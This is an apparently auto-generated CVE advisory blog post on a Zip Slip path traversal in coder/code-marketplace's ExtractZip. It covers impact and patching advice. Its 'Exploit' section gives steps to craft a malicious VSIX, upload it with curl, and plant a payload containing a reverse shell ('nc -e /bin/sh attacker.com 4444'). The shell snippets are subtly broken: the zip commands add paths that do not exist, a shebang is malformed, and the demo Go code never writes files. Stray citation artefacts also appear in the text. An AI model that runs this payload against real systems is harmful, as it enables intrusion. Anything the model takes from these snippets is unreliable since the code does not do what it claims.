coder/code-marketplace, Path Traversal, CVE-2025-XXXXX (Medium)

Listen to this Post

How the CVE Works (Zip Slip Path Traversal):

The vulnerability exists in the `ExtractZip` function of coder/code-marketplace versions ≤ v2.4.1【8†L3-L5】. This function passes the raw, attacker-controlled `zf.Name` from a malicious VSIX file directly to a caller-supplied callback without any sanitization【8†L10-L12】. The `AddExtension` function then constructs the output path by joining the extraction directory with the unvalidated zip entry name using filepath.Join(dir, name)【8†L15-L17】. While Go’s `filepath.Join` lexically resolves `..` components, it does not check whether the final resolved path stays within the intended base directory【8†L19-L21】. As a result, a zip entry name like `../../../../etc/cron.d/evil` will be resolved to /etc/cron.d/evil, escaping the extension’s sandboxed directory【8†L19-L21】. An authenticated attacker can upload a crafted VSIX file containing such path-traversal entries. Upon extraction, the application writes files to attacker-chosen locations writable by the marketplace process. This can lead to cron job injection, SSH key injection, `ld.so.preload` hijacking, or overwriting critical binaries, depending on the process privileges【8†L27-L30】. The issue was fixed in version v2.4.2【8†L36-L37】.

DailyCVE Form:

Platform: Go Application
Version: ≤ v2.4.1
Vulnerability : Zip Slip Path Traversal
Severity: Medium
date: 2025-04-05

Prediction: Patch already available (v2.4.2)

Analytics under What Undercode Say:

Bash commands and codes related to the blog

Simulate the vulnerable extraction process
mkdir -p /tmp/vuln_extract
cd /tmp/vuln_extract
Create a malicious VSIX (ZIP) file with path traversal entries
echo "malicious content" > evil.txt
zip malicious.vsix "../../../../etc/cron.d/evil"
Demonstrate the vulnerable Go code behavior (conceptual)
cat << EOF > vulnerable.go
package main
import (
"archive/zip"
"fmt"
"io"
"os"
"path/filepath"
)
func ExtractZip(zipPath, destDir string) error {
r, _ := zip.OpenReader(zipPath)
defer r.Close()
for _, f := range r.File {
// Vulnerable: using f.Name directly without sanitization
targetPath := filepath.Join(destDir, f.Name)
fmt.Printf("Extracting to: %s\n", targetPath)
// ... extraction logic
}
return nil
}
func main() {
ExtractZip("malicious.vsix", "/tmp/vuln_extract")
}
EOF
go run vulnerable.go
Check where the file landed
ls -la /etc/cron.d/evil

Exploit:

Craft a malicious VSIX file with a path traversal payload
cat << EOF > manifest.json
{"name":"malicious","publisher":"attacker","version":"1.0.0"}
EOF
zip payload.vsix manifest.json
Add a file with a path traversal name to the ZIP
printf '!/bin/bash\nnc -e /bin/sh attacker.com 4444' > payload.sh
zip payload.vsix "../../../../usr/local/bin/malicious.sh"
Upload the crafted VSIX to the marketplace
curl -X POST https://target-marketplace/api/extensions/upload \
-H "Authorization: Bearer \$TOKEN" \
-F "[email protected]"
Trigger extraction (e.g., by installing the extension)
The payload will be written to /usr/local/bin/malicious.sh
Execute the backdoor (if writable and executable)
/usr/local/bin/malicious.sh

Protection from this CVE:

  • Upgrade to coder/code-marketplace version v2.4.2 or later【8†L36-L37】.
  • Implement a secure extraction function that validates each file path against the base directory before writing, e.g., by using `filepath.Join` and then checking if the result starts with the base path.
  • Use a safe extraction API like `archive/tar` with explicit path validation, or a library that prevents Zip Slip (e.g., github.com/secure-archive/secure-zip).
  • Apply least privilege principle: run the marketplace process with minimal filesystem write permissions (e.g., read-only on system directories).
  • Use filesystem isolation like containers (Docker) or sandboxes (gVisor) to limit the impact of arbitrary file writes.

Impact:

  • Arbitrary File Write: Attackers can write files to any location writable by the marketplace process, bypassing directory restrictions.
  • Persistence: Injection into cron, init scripts, or systemd services allows attackers to maintain access across reboots.
  • Privilege Escalation: Overwriting binaries or configuration files (e.g., /etc/sudoers, ld.so.preload) can lead to full system compromise.
  • Supply Chain Attack: Malicious extensions distributed through the marketplace can compromise all users who install them.
  • Data Exfiltration: Writing files to web-accessible directories can expose sensitive information.
  • Denial of Service: Overwriting critical system files can render the application or host inoperable.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top